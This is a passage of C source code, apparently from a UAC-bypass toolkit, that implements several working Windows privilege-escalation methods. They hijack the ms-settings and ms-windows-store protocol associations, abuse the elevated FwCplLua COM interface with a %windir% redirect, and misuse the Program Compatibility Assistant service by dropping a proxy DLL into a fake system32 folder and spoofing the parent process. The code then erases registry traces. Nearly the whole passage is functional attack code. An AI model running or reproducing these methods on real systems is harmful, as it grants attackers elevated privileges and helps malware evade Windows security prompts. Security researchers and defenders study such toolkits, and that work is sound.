lpszPayload,\n            FALSE,\n            NULL);\n\n        if (!NT_SUCCESS(MethodResult)) {\n            break;\n        }\n\n        MethodResult = STATUS_ACCESS_DENIED;\n\n        r = ucmAllocateElevatedObject(T_CLSID_SecurityCenter,\n            &IID_WscAdmin,\n  
          CLSCTX_LOCAL_SERVER,\n            &WscAdminObject);\n\n        if (SUCCEEDED(r)) {\n\n            r = WscAdminObject->lpVtbl->Initialize(WscAdminObject);\n            if (SUCCEEDED(r)) {\n\n                supEnableToastForProtocol(T_PROTO_HTTP, FALSE);\n\n                r = WscAdminObject->lpVtbl->DoModalSecurityAction(WscAdminObject, NULL, 103, NULL);\n\n                Sleep(1000);\n\n                if (SUCCEEDED(r)) MethodResult = STATUS_SUCCESS;\n\n            }\n        }\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    if (WscAdminObject)\n        WscAdminObject->lpVtbl->Release(WscAdminObject);\n\n    if (protoGuidString) {\n\n        supUnregisterShellAssoc(T_PROTO_HTTP,\n            protoGuidString,\n            &SetUserAssoc);\n\n        CoTaskMemFree(protoGuidString);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return MethodResult;\n}\n\n/*\n* ucmFwCplLuaMethod2\n*\n* Purpose:\n*\n* Bypass UAC using FwCplLua undocumented COM interface and shell association registry hijack.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n* Note:\n*\n* Protocol name defined as const (e.g. 
pe386).\n* ProgId generated with CoCreateGuid and will be different each run.\n*\n*/\nNTSTATUS ucmFwCplLuaMethod2(\n    _In_ LPCWSTR lpszPayload\n)\n{\n    BOOL fEnvSet = FALSE, fDirCreated = FALSE;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT r = E_FAIL, hr_init;\n    ULONG DataSize = 0, SnapinSize = 0;\n    SIZE_T nLen, PayloadDirNameLen = 0, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0, ProtocolNameLen;\n    PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;\n    PVOID ImageBaseAddress = g_hInstance;\n    LPOLESTR protoGuidString = NULL;\n    CHAR* pszMarker;\n    IFwCplLua* FwCplLua = NULL;\n\n    USER_ASSOC_PTR SetUserAssoc;\n    GUID guid;\n    WCHAR szBuffer[MAX_PATH + 1];\n    WCHAR szPayloadDir[MAX_PATH * 2];\n    CHAR szProtocol[MAX_PATH];\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n    RtlSecureZeroMemory(&szPayloadDir, sizeof(szPayloadDir));\n\n    do {\n\n        //\n        // Create GUID.\n        //\n        if (CoCreateGuid(&guid) != S_OK)\n            break;\n\n        if (StringFromCLSID(&guid, &protoGuidString) != S_OK)\n            break;\n\n        //\n        // Convert protocol name to ANSI to be used in msc modification next.\n        //\n        ProtocolNameLen = _strlen(MYSTERIOUSCUTETHING);\n        RtlSecureZeroMemory(szProtocol, sizeof(szProtocol));\n        WideCharToMultiByte(CP_ACP, 0,\n            MYSTERIOUSCUTETHING,\n            -1,\n            szProtocol,\n            sizeof(szProtocol),\n            NULL,\n            NULL);\n\n        _strcat_a(szProtocol, \":\");\n\n        //\n        // Decrypt and decompress custom Kamikaze snap-in.\n        //\n        SnapinResource = supLdrQueryResourceData(\n            KAMIKAZE_ID,\n            ImageBaseAddress,\n            &DataSize);\n\n        if (SnapinResource) {\n            SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, 
&SnapinSize);\n            if (SnapinData == NULL)\n                break;\n        }\n        else\n            break;\n\n        //\n        // Create destination dir \"system32\" in %temp%\n        //\n        _strcpy(szPayloadDir, g_ctx->szTempDirectory);\n        _strcat(szPayloadDir, SYSTEM32_DIR_NAME);\n        PayloadDirNameLen = _strlen(szPayloadDir);\n        if (!CreateDirectory(szPayloadDir, NULL)) {\n            if (GetLastError() != ERROR_ALREADY_EXISTS)\n                break;\n        }\n\n        fDirCreated = TRUE;\n\n        //\n        // Set new %windir% environment variable.\n        //\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n\n        nLen = _strlen(szBuffer);\n        if (szBuffer[nLen - 1] == L'\\\\') {\n            szBuffer[nLen - 1] = 0;\n        }\n\n        fEnvSet = supSetEnvVariable(FALSE, NULL, T_WINDIR, szBuffer);\n        if (fEnvSet == FALSE)\n            break;\n\n        //\n        // Find UserAssocSet\n        //\n        MethodResult = supFindUserAssocSet(&SetUserAssoc);\n        if (!NT_SUCCESS(MethodResult))\n            break;\n\n        //\n        // Register shell protocol.\n        //\n        MethodResult = supRegisterShellAssoc(MYSTERIOUSCUTETHING,\n            protoGuidString,\n            &SetUserAssoc,\n            lpszPayload,\n            TRUE,\n            NULL);\n\n        if (!NT_SUCCESS(MethodResult))\n            break;\n\n        MscBufferSize = ALIGN_UP_BY(1 + (SIZE_T)SnapinSize + (SIZE_T)sizeof(szProtocol), (SIZE_T)PAGE_SIZE);\n        MscBufferPtr = supVirtualAlloc(\n            &MscBufferSize,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE, NULL);\n        if (MscBufferPtr == NULL)\n            break;\n\n        //\n        // Reconfigure msc snapin and write it to the %temp%\\system32.\n        //\n        pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);\n        if (pszMarker) {\n\n            //\n            // Copy first part of snapin 
(unchanged).\n            //\n            MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);\n            MscSize = MscBytesIO;\n            RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);\n\n            //\n            // Copy modified part.\n            //\n\n            MscBytesIO = ProtocolNameLen;\n\n            //Include \":\" element.\n            MscBytesIO++;\n\n            //Copy guid.\n            RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szProtocol, MscBytesIO);\n            MscSize += MscBytesIO;\n\n            //\n            // Copy all of the rest.\n            //\n            while (*pszMarker != 0 && *pszMarker != '<') {\n                pszMarker++;\n            }\n\n            MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);\n            RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);\n            MscSize += MscBytesIO;\n\n            //\n            // Write result to the file.\n            //\n            _strcat(szPayloadDir, TEXT(\"\\\\\"));\n            _strcat(szPayloadDir, WF_MSC);\n            if (!supWriteBufferToFile(szPayloadDir, MscBufferPtr, (ULONG)MscSize))\n                break;\n\n            supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n            MscBufferPtr = NULL;\n        }\n\n        //\n        // Get elevated COM object for FwCplLua interface.\n        //\n        r = ucmAllocateElevatedObject(\n            T_CLSID_FwCplLua,\n            &IID_IFwCplLua,\n            CLSCTX_LOCAL_SERVER,\n            &FwCplLua);\n\n        if (r != S_OK)\n            break;\n\n        if (FwCplLua == NULL) {\n            break;\n        }\n\n        //\n        // Execute method from FwCplLua interface.\n        // This will trigger our payload as shell will attempt to run it.\n        //\n        r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);\n        if (SUCCEEDED(r))\n            MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n 
   //\n    // Cleanup.\n    //\n    if (MscBufferPtr) {\n        supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n    }\n    if (SnapinData) {\n        supSecureVirtualFree(SnapinData, SnapinSize, NULL);\n    }\n\n    if (FwCplLua != NULL) {\n        FwCplLua->lpVtbl->Release(FwCplLua);\n    }\n\n    Sleep(2000);\n\n    if (protoGuidString) {\n\n        supUnregisterShellAssoc(MYSTERIOUSCUTETHING,\n            protoGuidString,\n            &SetUserAssoc);\n\n        CoTaskMemFree(protoGuidString);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    if (fEnvSet)\n        supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);\n\n    if (fDirCreated) {\n        DeleteFile(szPayloadDir);\n        szPayloadDir[PayloadDirNameLen] = 0;\n        RemoveDirectory(szPayloadDir);\n    }\n\n    return MethodResult;\n}\n\n/*\n* ucmMsSettingsProtocolMethod\n*\n* Purpose:\n*\n* Bypass UAC by registering own ms-settings protocol.\n*\n*/\nNTSTATUS ucmMsSettingsProtocolMethod(\n    _In_ LPCWSTR lpszPayload\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT hr_init;\n\n    LPOLESTR protoGuidString = NULL;\n    USER_ASSOC_PTR SetUserAssoc;\n    GUID guid;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n\n    hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);\n\n    do {\n\n        if (CoCreateGuid(&guid) != S_OK)\n            break;\n\n        if (StringFromCLSID(&guid, &protoGuidString) != S_OK)\n            break;\n\n        //\n        // Find UserAssocSet\n        //\n        MethodResult = supFindUserAssocSet(&SetUserAssoc);\n        if (!NT_SUCCESS(MethodResult))\n            break;\n\n        //\n        // Register shell protocol.\n        //\n        MethodResult = supRegisterShellAssoc(T_MSSETTINGS,\n            protoGuidString,\n            &SetUserAssoc,\n            lpszPayload,\n            TRUE,\n            NULL);\n\n        if (NT_SUCCESS(MethodResult)) {\n\n            
_strcpy(szBuffer, g_ctx->szSystemDirectory);\n            _strcat(szBuffer, FODHELPER_EXE);\n\n            MethodResult = supRunProcess(szBuffer, NULL) ?\n                STATUS_SUCCESS : STATUS_ACCESS_DENIED;\n\n        }\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    if (protoGuidString) {\n\n        supUnregisterShellAssoc(T_MSSETTINGS,\n            protoGuidString,\n            &SetUserAssoc);\n\n        CoTaskMemFree(protoGuidString);\n    }\n\n    if (SUCCEEDED(hr_init))\n        CoUninitialize();\n\n    return MethodResult;\n}\n\n/*\n* ucmxGetServiceState\n*\n* Purpose:\n*\n* Return service state.\n*\n*/\nDWORD ucmxGetServiceState(\n    _In_ SC_HANDLE ServiceHandle\n)\n{\n    SERVICE_STATUS_PROCESS svcStatus;\n\n    ULONG dummy;\n\n    if (QueryServiceStatusEx(\n        ServiceHandle,\n        SC_STATUS_PROCESS_INFO,\n        (LPBYTE)&svcStatus,\n        sizeof(svcStatus),\n        &dummy))\n    {\n        return svcStatus.dwCurrentState;\n    }\n\n    return SERVICE_STOPPED;\n}\n\n/*\n* ucmxRunService\n*\n* Purpose:\n*\n* Start given service if stopped.\n*\n*/\nBOOLEAN ucmxRunService(\n    _In_ LPCWSTR lpServiceName\n)\n{\n    BOOLEAN bRunning = FALSE;\n    SC_HANDLE schManager = NULL, schService = NULL;\n    ULONG dwState, uRetryCount;\n\n    do {\n\n        schManager = OpenSCManager(\n            NULL,\n            SERVICES_ACTIVE_DATABASE,\n            SC_MANAGER_CONNECT);\n\n        if (schManager == NULL)\n            break;\n\n        schService = OpenService(\n            schManager,\n            lpServiceName,\n            SERVICE_QUERY_STATUS | SERVICE_START);\n\n        if (schService == NULL)\n            break;\n\n        dwState = ucmxGetServiceState(schService);\n\n        if (dwState == SERVICE_RUNNING) {\n            bRunning = TRUE;\n            break;\n        }\n\n        if (dwState == SERVICE_PAUSE_PENDING ||\n            dwState == SERVICE_STOP_PENDING)\n        {\n\n            uRetryCount = 5;\n\n            do 
{\n\n                dwState = ucmxGetServiceState(schService);\n                if (dwState == SERVICE_RUNNING) {\n                    bRunning = TRUE;\n                    break;\n                }\n\n                Sleep(1000);\n\n            } while (--uRetryCount);\n\n        }\n\n        if (dwState == SERVICE_STOPPED) {\n\n            if (StartService(schService, 0, NULL)) {\n\n                Sleep(1000);\n\n                dwState = ucmxGetServiceState(schService);\n                if (dwState == SERVICE_RUNNING) {\n                    bRunning = TRUE;\n                    break;\n                }\n\n            }\n\n        }\n\n    } while (FALSE);\n\n    if (schService)\n        CloseServiceHandle(schService);\n\n    if (schManager)\n        CloseServiceHandle(schManager);\n\n    return bRunning;\n}\n\n/*\n* ucmxIsAppXSvcRunning\n*\n* Purpose:\n*\n* Return running state of AppXSvc (restart it if stopped).\n*\n*/\nBOOLEAN ucmxIsAppXSvcRunning(\n    VOID\n)\n{\n    return ucmxRunService(T_APPXSVC);\n}\n\n/*\n* ucmxCleanupNoStore\n*\n* Purpose:\n*\n* Remove store association key.\n*\n*/\nVOID ucmxCleanupNoStore(\n    VOID\n)\n{\n    NTSTATUS ntStatus;\n    HANDLE classesKey = NULL;\n    WCHAR szBuffer[MAX_PATH + 1];\n\n    ntStatus = supOpenClassesKey(NULL, &classesKey);\n    if (!NT_SUCCESS(ntStatus))\n        return;\n\n    _strcpy(szBuffer, T_MSWINDOWSSTORE);\n    _strcat(szBuffer, TEXT(\"\\\\shell\"));\n    supRegDeleteKeyRecursive(classesKey, szBuffer);\n\n    NtClose(classesKey);\n}\n\n/*\n* ucmxMsStoreProtocolNoStore\n*\n* Purpose:\n*\n* Bypass UAC by registering own ms-windows-store protocol.\n*\n*/\nNTSTATUS ucmxMsStoreProtocolNoStore(\n    _In_ LPCWSTR lpszPayload\n)\n{\n    HANDLE classesKey = NULL, protoKey = NULL;\n    NTSTATUS ntStatus;\n    SIZE_T sz;\n    WCHAR szBuffer[MAX_PATH + 1];\n\n    ntStatus = supOpenClassesKey(NULL, &classesKey);\n    if (!NT_SUCCESS(ntStatus))\n        return ntStatus;\n\n    if (ERROR_SUCCESS == 
RegCreateKeyEx(classesKey,\n        T_MSWINDOWSSTORE,\n        0,\n        NULL,\n        REG_OPTION_NON_VOLATILE,\n        MAXIMUM_ALLOWED,\n        NULL,\n        (HKEY*)&protoKey,\n        NULL))\n    {\n        RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);\n        RegCloseKey(protoKey);\n    }\n\n    _strcpy(szBuffer, T_MSWINDOWSSTORE);\n    _strcat(szBuffer, T_SHELL_OPEN);\n    _strcat(szBuffer, TEXT(\"\\\\\"));\n    _strcat(szBuffer, T_SHELL_COMMAND);\n\n    if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,\n        szBuffer,\n        0,\n        NULL,\n        REG_OPTION_NON_VOLATILE,\n        MAXIMUM_ALLOWED,\n        NULL,\n        (HKEY*)&protoKey,\n        NULL))\n    {\n\n        sz = (_strlen(lpszPayload) + 1) * sizeof(WCHAR);\n\n        if (ERROR_SUCCESS == RegSetValueEx(protoKey,\n            TEXT(\"\"),\n            0,\n            REG_SZ,\n            (BYTE*)lpszPayload,\n            (DWORD)sz))\n        {\n            ntStatus = STATUS_SUCCESS;\n        }\n        else {\n            ntStatus = STATUS_REGISTRY_IO_FAILED;\n        }\n\n        RegCloseKey(protoKey);\n    }\n    else {\n        ntStatus = STATUS_REGISTRY_IO_FAILED;\n    }\n\n    NtClose(classesKey);\n\n    return ntStatus;\n}\n\n/*\n* ucmMsStoreProtocolMethod\n*\n* Purpose:\n*\n* Bypass UAC by registering own ms-windows-store protocol.\n*\n*/\nNTSTATUS ucmMsStoreProtocolMethod(\n    _In_ LPCWSTR lpszPayload\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT hr_init;\n\n    LPOLESTR protoGuidString = NULL;\n    USER_ASSOC_PTR SetUserAssoc;\n    GUID guid;\n\n    BOOLEAN bAppXRunning = FALSE;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n\n    do {\n\n        bAppXRunning = ucmxIsAppXSvcRunning();\n        if (bAppXRunning) {\n\n            if (CoCreateGuid(&guid) != S_OK)\n                break;\n\n            if 
(StringFromCLSID(&guid, &protoGuidString) != S_OK)\n                break;\n\n            //\n            // Find UserAssocSet\n            //\n            MethodResult = supFindUserAssocSet(&SetUserAssoc);\n            if (!NT_SUCCESS(MethodResult)) {\n                break;\n            }\n\n            supEnableToastForProtocol(T_MSWINDOWSSTORE, FALSE);\n\n            //\n            // Register shell protocol.\n            //\n            MethodResult = supRegisterShellAssoc(T_MSWINDOWSSTORE,\n                protoGuidString,\n                &SetUserAssoc,\n                lpszPayload,\n                TRUE,\n                T_URL_MS_WIN_STORE);\n\n\n        }\n        else {\n            //\n            // AppXSvc not running or in inconsistent state, try other method.\n            //\n            MethodResult = ucmxMsStoreProtocolNoStore(lpszPayload);\n        }\n\n        if (NT_SUCCESS(MethodResult)) {\n\n            _strcpy(szBuffer, g_ctx->szSystemDirectory);\n            _strcat(szBuffer, WSRESET_EXE);\n\n            MethodResult = supRunProcess2(\n                szBuffer,\n                NULL,\n                TEXT(\"open\"),\n                SW_HIDE,\n                INFINITE) ?\n                STATUS_SUCCESS : STATUS_ACCESS_DENIED;\n\n        }\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    if (bAppXRunning) {\n\n        if (protoGuidString) {\n\n            supUnregisterShellAssoc(T_MSWINDOWSSTORE,\n                protoGuidString,\n                &SetUserAssoc);\n\n            CoTaskMemFree(protoGuidString);\n        }\n    }\n    else {\n        ucmxCleanupNoStore();\n    }\n\n    if (SUCCEEDED(hr_init))\n        CoUninitialize();\n\n    return MethodResult;\n}\n\n#define PCA_MONITOR_PROCESS_NORMAL 0\n#define PCA_MONITOR_PROCESS_NOCHAIN 1\n#define PCA_MONITOR_PROCESS_AS_INSTALLER 2\n\n/*\n* ucmxRemoveLoaderEntryFromRegistry\n*\n* Purpose:\n*\n* Cleanup registry entries.\n*\n*/\nULONG ucmxRemoveLoaderEntryFromRegistry(\n    
_In_ HKEY hRootKey,\n    _In_ LPCWSTR lpRegPath,\n    _In_ LPCWSTR lpLoaderName\n)\n{\n    HKEY hKey;\n\n    DWORD i, dwValuesCount = 0, cchValue, dwType, cRemoved = 0;\n\n    WCHAR szValue[MAX_PATH + 1];\n\n    do {\n        if (ERROR_SUCCESS != RegOpenKeyEx(hRootKey,\n            lpRegPath,\n            0,\n            KEY_READ | KEY_SET_VALUE,\n            &hKey))\n        {\n            break;\n        }\n\n        if (ERROR_SUCCESS != RegQueryInfoKey(hKey,\n            NULL,\n            NULL,\n            NULL,\n            NULL,\n            NULL,\n            NULL,\n            &dwValuesCount,\n            NULL,\n            NULL,\n            NULL,\n            NULL))\n        {\n            break;\n        }\n\n        if (dwValuesCount == 0)\n            break;\n\n        RtlSecureZeroMemory(&szValue, sizeof(szValue));\n\n        for (i = 0; i < dwValuesCount; i++) {\n\n            dwType = 0;\n            cchValue = MAX_PATH;\n\n            if (ERROR_SUCCESS == RegEnumValue(hKey,\n                i,\n                (LPWSTR)&szValue,\n                (LPDWORD)&cchValue,\n                NULL,\n                &dwType,\n                NULL,\n                NULL))\n            {\n                if (dwType == REG_BINARY) {\n\n                    if (NULL != _strstri(szValue, lpLoaderName)) {\n\n                        if (ERROR_SUCCESS == RegDeleteValue(hKey, szValue))\n                            cRemoved++;\n\n                    }\n                }\n\n                szValue[0] = 0;\n            }\n\n        }\n\n\n    } while (FALSE);\n\n    RegCloseKey(hKey);\n\n    return cRemoved;\n}\n\ntypedef struct _PCA_LOADER_BLOCK {\n    ULONG OpResult;\n    WCHAR szLoader[MAX_PATH + 1];\n} PCA_LOADER_BLOCK;\n\n/*\n* ucmPcaMethod\n*\n* Purpose:\n*\n* Bypass UAC using Program Compatibility Assistant.\n*\n* AlwaysNotify compatible.\n*\n*/\nNTSTATUS ucmPcaMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    BOOL fEnvSet = FALSE, 
fDirCreated = FALSE, fLoaderCreated = FALSE, fUsePca = TRUE;\n    ULONG ulResult = 0, seedValue;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;\n    HRESULT hr_init;\n    SIZE_T cchDirName = 0, nLen, viewSize = PAGE_SIZE;\n\n    HANDLE hSharedSection = NULL, hSharedEvent = NULL;\n    HANDLE hShellProcess = NULL;\n\n    UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);\n\n    RPC_BINDING_HANDLE rpcHandle = NULL;\n    RPC_STATUS rpcStatus;\n\n    STARTUPINFO startupInfo;\n    PROCESS_INFORMATION processInfo;\n\n    PCA_LOADER_BLOCK* pvLoaderBlock = NULL;\n\n    LARGE_INTEGER liValue;\n\n    OBJECT_ATTRIBUTES obja;\n    UNICODE_STRING usObjectName;\n\n    WCHAR szBuffer[MAX_PATH * 2], szEnvVar[MAX_PATH * 2];\n    WCHAR szLoader[MAX_PATH * 2];\n    WCHAR szLoaderName[64];\n\n    WCHAR szLoaderCmdLine[2];\n    WCHAR szObjectName[MAX_PATH];\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n    RtlSecureZeroMemory(&szLoader, sizeof(szLoader));\n    RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n    RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n\n    do {\n\n        if (!ucmxRunService(T_PCASVC))\n            break;\n\n        if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {\n            fUsePca = FALSE;\n        }\n\n        RtlSecureZeroMemory(&szLoaderName, sizeof(szLoaderName));\n\n        seedValue = ~GetTickCount();\n        liValue.LowPart = RtlRandomEx(&seedValue);\n        seedValue = GetTickCount();\n        liValue.HighPart = RtlRandomEx(&seedValue);\n\n        supBinTextEncode(liValue.QuadPart, szLoaderName);\n        _strcat(szLoaderName, TEXT(\".exe\"));\n\n        //\n        // Create shared loader section.\n        //\n        RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));\n        _strcpy(szObjectName, TEXT(\"\\\\Sessions\\\\\"));\n        ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));\n        _strcat(szObjectName, 
TEXT(\"\\\\BaseNamedObjects\\\\\"));\n        supGenerateSharedObjectName((WORD)FUBUKI_PCA_SECTION_ID, _strend(szObjectName));\n\n        liValue.QuadPart = PAGE_SIZE;\n\n        RtlInitUnicodeString(&usObjectName, szObjectName);\n        InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n        ntStatus = NtCreateSection(&hSharedSection,\n            SECTION_ALL_ACCESS,\n            &obja,\n            &liValue,\n            PAGE_READWRITE,\n            SEC_COMMIT,\n            NULL);\n\n        if (!NT_SUCCESS(ntStatus) || (hSharedSection == NULL)) {\n            break;\n        }\n\n        ntStatus = NtMapViewOfSection(\n            hSharedSection,\n            NtCurrentProcess(),\n            &pvLoaderBlock,\n            0,\n            PAGE_SIZE,\n            NULL,\n            &viewSize,\n            ViewUnmap,\n            MEM_TOP_DOWN,\n            PAGE_READWRITE);\n\n        if (!NT_SUCCESS(ntStatus) || (pvLoaderBlock == NULL)) {\n            break;\n        }\n\n        //\n        // Create completion event.\n        //\n        _strcpy(szObjectName, TEXT(\"\\\\BaseNamedObjects\\\\\"));\n        supGenerateSharedObjectName((WORD)FUBUKI_PCA_EVENT_ID, _strend(szObjectName));\n\n        RtlInitUnicodeString(&usObjectName, szObjectName);\n        InitializeObjectAttributes(&obja, &usObjectName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n        ntStatus = NtCreateEvent(&hSharedEvent,\n            EVENT_ALL_ACCESS,\n            &obja,\n            SynchronizationEvent,\n            FALSE);\n\n        if (!NT_SUCCESS(ntStatus) || (hSharedEvent == NULL)) {\n            break;\n        }\n\n        //\n        // Stop WDI\\ResolutionHost task.\n        //\n        if (!supStopTaskByName(\n            TEXT(\"Microsoft\\\\Windows\\\\WDI\"),\n            TEXT(\"ResolutionHost\")))\n        {\n            break;\n        }\n\n        supEnumProcessesForSession(NtCurrentPeb()->SessionId,\n            
(pfnEnumProcessCallback)supEnumTaskhostTasksCallback, (PVOID)&uStrTaskhost);\n\n        //\n        // Create destination dir \"system32\"\n        //\n        _strcpy(szBuffer, g_ctx->szCurrentDirectory);\n        _strcat(szBuffer, SYSTEM32_DIR_NAME);\n        cchDirName = _strlen(szBuffer);\n        if (!CreateDirectory(szBuffer, NULL)) {\n            if (GetLastError() != ERROR_ALREADY_EXISTS) {\n                break;\n            }\n        }\n\n        fDirCreated = TRUE;\n\n        //\n        // Convert payload for dll hijack.\n        //\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            ProxyDllSize,\n            FUBUKI_ENTRYPOINT_PCADLL,\n            FALSE))\n        {\n            break;\n        }\n\n        //\n        // Drop payload to the fake system32 dir as PCADM.DLL.\n        //\n        szBuffer[cchDirName] = 0;\n        _strcat(szBuffer, TEXT(\"\\\\\"));\n        _strcat(szBuffer, PCADM_DLL);\n        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize)) {\n            break;\n        }\n\n        //\n        // Convert dll to exe to be loader task.\n        //\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            ProxyDllSize,\n            FUBUKI_ENTRYPOINT_PCAEXE,\n            TRUE))\n        {\n            break;\n        }\n\n        //\n        // Drop loader to the temp dir.\n        //\n        _strcpy(szLoader, g_ctx->szCurrentDirectory);\n        _strcat(szLoader, szLoaderName);\n        fLoaderCreated = supWriteBufferToFile(szLoader, ProxyDll, ProxyDllSize);\n        if (!fLoaderCreated) {\n            break;\n        }\n\n        //\n        // Remember loader name\n        //\n        _strcpy(pvLoaderBlock->szLoader, szLoader);\n\n        //\n        // Set new %windir% environment variable.\n        //\n        _strcpy(szEnvVar, g_ctx->szCurrentDirectory);\n        nLen = _strlen(szEnvVar);\n        if (szEnvVar[nLen - 1] == L'\\\\') {\n            szEnvVar[nLen - 1] = 0;\n       
 }\n\n        fEnvSet = supSetEnvVariable2(FALSE, NULL, T_WINDIR, szEnvVar);\n        if (fEnvSet == FALSE) {\n            break;\n        }\n\n        //\n        // Set loader command line.\n        //\n        szLoaderCmdLine[0] = (fUsePca) ? TEXT('1') : TEXT('3');\n        szLoaderCmdLine[1] = 0;\n\n        //\n        // Run loader suspended with parent set to shell process.\n        //\n        if (fUsePca) {\n\n            hShellProcess = supOpenShellProcess(PROCESS_CREATE_PROCESS);\n            if (hShellProcess == NULL) {\n                break;\n            }\n\n            processInfo.hProcess = supRunProcessFromParent(hShellProcess,\n                szLoader,\n                szLoaderCmdLine,\n                NULL,\n                CREATE_SUSPENDED | CREATE_NO_WINDOW,\n                0,\n                &processInfo.hThread);\n\n        }\n        else {\n\n            startupInfo.cb = sizeof(startupInfo);\n            if (!CreateProcess(\n                szLoader,\n                szLoaderCmdLine,\n                NULL,\n                NULL,\n                FALSE,\n                CREATE_SUSPENDED | CREATE_NO_WINDOW,\n                NULL,\n                NULL,\n                &startupInfo,\n                &processInfo))\n            {\n                break;\n            }\n\n        }\n\n        if (processInfo.hProcess == NULL) {\n            break;\n        }\n\n        rpcStatus = supCreateBindingHandle(PCASVC_RPC, &rpcHandle);\n\n        if (rpcStatus == RPC_S_OK) {\n\n            if (fUsePca) {\n\n                __try {\n\n                    rpcStatus = RAiMonitorProcess(\n                        rpcHandle,\n                        (ULONG_PTR)processInfo.hProcess,\n                        0,\n                        szLoader,\n                        szLoaderCmdLine,\n                        g_ctx->szCurrentDirectory,\n                        PCA_MONITOR_PROCESS_NORMAL);\n\n\n                }\n                __except 
(EXCEPTION_EXECUTE_HANDLER) {\n                    rpcStatus = GetExceptionCode();\n                }\n\n\n            }\n            else {\n\n                __try {\n\n                    rpcStatus = RAiNotifyUserCallbackExceptionProcess(\n                        rpcHandle,\n                        szLoader,\n                        1,\n                        processInfo.dwProcessId);\n\n                }\n                __except (EXCEPTION_EXECUTE_HANDLER) {\n                    rpcStatus = GetExceptionCode();\n                }\n\n            }\n\n            RpcBindingFree(&rpcHandle);\n        }\n\n        if (rpcStatus != RPC_S_OK)\n            break;\n\n        ResumeThread(processInfo.hThread);\n\n        WaitForSingleObject(processInfo.hProcess, INFINITE);\n\n        if (fUsePca) {\n\n            GetExitCodeProcess(processInfo.hProcess, &ulResult);\n\n            if (ulResult != 0)\n                break;\n        }\n\n        WaitForSingleObject(hSharedEvent, 20 * 1000);\n\n        MethodResult = (pvLoaderBlock->OpResult == FUBUKI_PCA_ALL_RUN) ? 
STATUS_SUCCESS : STATUS_ACCESS_DENIED;\n\n    } while (FALSE);\n\n    Sleep(2000);\n\n    //\n    // Cleanup.\n    //\n    if (processInfo.hThread)\n        CloseHandle(processInfo.hThread);\n\n    if (processInfo.hProcess) {\n        TerminateProcess(processInfo.hProcess, ERROR_SUCCESS);\n        CloseHandle(processInfo.hProcess);\n    }\n\n    if (hSharedEvent)\n        NtClose(hSharedEvent);\n\n    if (pvLoaderBlock)\n        NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pvLoaderBlock);\n\n    if (hSharedSection)\n        NtClose(hSharedSection);\n\n    if (fEnvSet)\n        supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);\n\n    if (fUsePca) {\n\n        ucmxRemoveLoaderEntryFromRegistry(\n            HKEY_CURRENT_USER,\n            T_PCA_STORE,\n            szLoaderName);\n\n    }\n    else {\n\n        ucmxRemoveLoaderEntryFromRegistry(\n            HKEY_LOCAL_MACHINE,\n            T_APPCOMPAT_LAYERS,\n            szLoaderName);\n\n        ucmxRemoveLoaderEntryFromRegistry(\n            HKEY_CURRENT_USER,\n            T_PCA_PERSISTED,\n            szLoaderName);\n\n    }\n\n    if (fLoaderCreated) {\n        DeleteFile(szLoader);\n    }\n\n    if (fDirCreated) {\n        DeleteFile(szBuffer);\n        